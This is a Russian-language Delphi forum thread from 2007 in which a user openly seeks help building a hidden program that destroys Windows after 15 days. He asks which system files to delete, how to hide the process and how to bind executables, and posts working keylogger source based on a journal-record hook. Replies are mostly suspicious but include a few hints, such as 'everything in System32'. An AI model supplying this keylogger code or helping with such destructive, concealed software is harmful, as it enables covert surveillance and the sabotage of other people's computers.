Форум по программированию Delphi Sources

 



Вернуться   Форум по программированию Delphi Sources > Софт > Windows / Linux & FreeBSD
Ник
Пароль
Регистрация <<         Правила форума         >> FAQ Пользователи Календарь Поиск Сообщения за сегодня Все разделы прочитаны

Ответ
 
Опции темы Поиск в этой теме Опции просмотра
  #1  
Старый 05.01.2007, 19:16
NeoN NeoN вне форума
Прохожий
 
Регистрация: 05.01.2007
Сообщения: 7
Репутация: 10
По умолчанию Список жизненно важных вайлов.

Здравствуйте.
Подскажите пожалуйста.
Мне нужен список жизненно важных файлов Windows'а и какие последствия вызовет из их устронение?
Спешу заверить вас, что эта информация не принесет никого вреда тем, кто этого не захочет.

И еще вопрос: Как можно сохранить долговечные переменные(это чтоб можно было прочитать значения после перезагрузки), если не брать в расчет запись в файл, и запись в реестр.
Ответить с цитированием
  #2  
Старый 05.01.2007, 23:06
Аватар для Ross
Ross Ross вне форума
Активный
 
Регистрация: 15.10.2005
Адрес: Казань
Сообщения: 250
Репутация: 30
Вопрос

Ну по второму: можно писать прям в EXE'шник.

А что эта за программа такая, которая не оставляет за собой следов деятельности и при этом интересуется жизненно важными файлами Windows'a? А она случайно в фоновом режиме не работает ли???
Ответить с цитированием
  #3  
Старый 06.01.2007, 19:10
ART ART вне форума
Продвинутый
 
Регистрация: 13.02.2006
Адрес: Магнитогорск
Сообщения: 669
Репутация: 14745
По умолчанию

На форуме половина вопросов про вирусмейкерство.
Ответить с цитированием
  #4  
Старый 07.01.2007, 12:42
NeoN NeoN вне форума
Прохожий
 
Регистрация: 05.01.2007
Сообщения: 7
Репутация: 10
По умолчанию

Да конечно, Ross, программа, которую я хочу сделать сидит в фоновом режиме(кстати, а можно ее вобще скрыть, чтоб даже в древе процессов небыло видно?) и по истечению 15 суток глушит систему.
Но идея была порождена в споре, и развивается уже как дело исключительно из соображения того, что я так не умею. Написал коряво, но думаю, вы как более опытный программист, очень хорошо понимаете о чем я.
Так все же, вы поможете мне?
И, если не затруднит, поподробнее касательно 'писать прям в EXE'шник'.

По поводу вирусмейкерства. Я думаю, что пусть человек лучше вирусы пишет, чем днями на пролет "косынку расскладывает".
Ответить с цитированием
  #5  
Старый 07.01.2007, 13:32
Аватар для Decoding
Decoding Decoding вне форума
Местный
 
Регистрация: 03.06.2006
Адрес: Почту найдете на моем сайте
Сообщения: 576
Версия Delphi: D10.2
Репутация: 214
По умолчанию

А я думаю, пусть лучше днями на пролет "косынку расскладывает"…
Ответить с цитированием
  #6  
Старый 07.01.2007, 21:22
NeoN NeoN вне форума
Прохожий
 
Регистрация: 05.01.2007
Сообщения: 7
Репутация: 10
По умолчанию

Ну, на то они и мнения, что разные...

Так что, помощи не ждать?
Ответить с цитированием
  #7  
Старый 08.01.2007, 14:16
ART ART вне форума
Продвинутый
 
Регистрация: 13.02.2006
Адрес: Магнитогорск
Сообщения: 669
Репутация: 14745
По умолчанию

Все что в папке System32
Ответить с цитированием
  #8  
Старый 08.01.2007, 20:48
NeoN NeoN вне форума
Прохожий
 
Регистрация: 05.01.2007
Сообщения: 7
Репутация: 10
По умолчанию

Расскажите, пожалуйста, как чрез Delphi сливать 2 файла в один? Я так понял, что есть 2-а независимых exe файла, и слив их в один, получаем новый exe, унаследовавший все возможности "родителей", так?
Ответить с цитированием
  #9  
Старый 08.01.2007, 21:59
NeoN NeoN вне форума
Прохожий
 
Регистрация: 05.01.2007
Сообщения: 7
Репутация: 10
По умолчанию

Подскажите, пожалуйста, как сделать следующий KeyLogger
Код:
...
var
...
  h:hhook;
...

function Proc(

    code:integer;
    wParam:WPARAM;
    lParam:LPARAM
   ):lresult;stdcall;
var c:array[0..255] of char;
    nScan:integer;
begin
 if (code>=0)and(teventmsg(pointer(lparam)^).message=wm_keydown) then begin
  nScan:=hibyte((teventmsg(pointer(lparam)^).paramL));
  nscan:=nscan shl 16;
  GetKeyNameText(nScan,c,256);
  form1.ListBox1.Items.Add(c);
 end;
 result:=callnexthookex(h,code,wparam,lparam);
end;

procedure TForm1.FormCreate(Sender: TObject);
begin
 h:=setwindowshookex(WH_JOURNALRECORD,@Proc,hinstance,0);
 caption:=inttostr(h);
end;

procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction);
begin
 unhookwindowshookex(h);
end;

Так вот, как сдлелать его мультиязычным?
Заранее благодарен за помощь и поддержку.
Ответить с цитированием
  #10  
Старый 10.01.2007, 09:51
Аватар для Ross
Ross Ross вне форума
Активный
 
Регистрация: 15.10.2005
Адрес: Казань
Сообщения: 250
Репутация: 30
По умолчанию

Ну в папке System32 куча драйверов и сервисных служб, надо вычислять какая одна из особо важных, к тому же антивирусняк может не дать доступа к монипуляциям в этой папке.
А по счёт записи в exe'шник на Delphiworld.narod.ru были статьи.
И так чисто по приколу скажу, обычно админ форума не позволяет таких тем на форуме (к тому же так в открытую), если он увидит этот топик может просто удалить его. (а может уже видил )
Был тут один тоже просил помочь вирусняк написать, админ стразу его прикрыл.
Ответить с цитированием
  #11  
Старый 10.01.2007, 09:53
Аватар для Ross
Ross Ross вне форума
Активный
 
Регистрация: 15.10.2005
Адрес: Казань
Сообщения: 250
Репутация: 30
По умолчанию

Цитата:
Сообщение от NeoN
Расскажите, пожалуйста, как чрез Delphi сливать 2 файла в один? Я так понял, что есть 2-а независимых exe файла, и слив их в один, получаем новый exe, унаследовавший все возможности "родителей", так?

Необязательно, есть два файла например с расширением .part001 и .part002 и программа их сливает и даёт необходимое расширение, я могу отослать исходник программы которая этим занимется, я делал такую. И к тому же свойства не унаследуются, я как делал, если файл резаный то их сливаем и получается рабочий файл.
Ответить с цитированием
  #12  
Старый 12.01.2007, 01:45
NeoN NeoN вне форума
Прохожий
 
Регистрация: 05.01.2007
Сообщения: 7
Репутация: 10
По умолчанию

Ross, мне бы очень хотелось посмотреть на эту программу.
Мне очень интерсно, скажи, сколько лет, ты занимаешься программированием? С какими языками умеешь обращаться?
Просто я примерно 1,5 года ежедневно бьюсь (0,5 VB и 1 Delphi), и нифига толгового самостоятельно сделать не могу. Недавно взялся за DirectDraw - вообще темный лес для меня. Рублю, рублю, а просвета нету и даже не пахнет. Может это все пустое? Может здесь тоже нужно иметь что-то изнутри? Как, например, не каждый может стать певцом или художником.

Исходный код программы закинь, пожалуйста, на мыло: neon_666@mail.ru
Ответить с цитированием
  #13  
Старый 13.01.2007, 18:14
ART ART вне форума
Продвинутый
 
Регистрация: 13.02.2006
Адрес: Магнитогорск
Сообщения: 669
Репутация: 14745
По умолчанию

Нужны талант и упорство
Ответить с цитированием
  #14  
Старый 14.01.2007, 01:29
Аватар для Ross
Ross Ross вне форума
Активный
 
Регистрация: 15.10.2005
Адрес: Казань
Сообщения: 250
Репутация: 30
По умолчанию

Цитата:
Сообщение от NeoN
Ross, мне бы очень хотелось посмотреть на эту программу.
Мне очень интерсно, скажи, сколько лет, ты занимаешься программированием? С какими языками умеешь обращаться?
Просто я примерно 1,5 года ежедневно бьюсь (0,5 VB и 1 Delphi), и нифига толгового самостоятельно сделать не могу. Недавно взялся за DirectDraw - вообще темный лес для меня. Рублю, рублю, а просвета нету и даже не пахнет. Может это все пустое? Может здесь тоже нужно иметь что-то изнутри? Как, например, не каждый может стать певцом или художником.

Исходный код программы закинь, пожалуйста, на мыло: neon_666@mail.ru

Отправлю завтра.
Ответить с цитированием
  #15  
Старый 16.01.2007, 08:11
NeoN NeoN вне форума
Прохожий
 
Регистрация: 05.01.2007
Сообщения: 7
Репутация: 10
По умолчанию

Ну, завтра так завтра...
Ответить с цитированием
Ответ



Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать темы
Вы не можете отвечать на сообщения
Вы не можете прикреплять файлы
Вы не можете редактировать сообщения

BB-коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход


Часовой пояс GMT +3, время: 11:04.


 

Сайт

Форум

FAQ

RSS лента

Прочее

 

Copyright © Форум "Delphi Sources", 2004-2019

ВКонтакте   Facebook   Twitter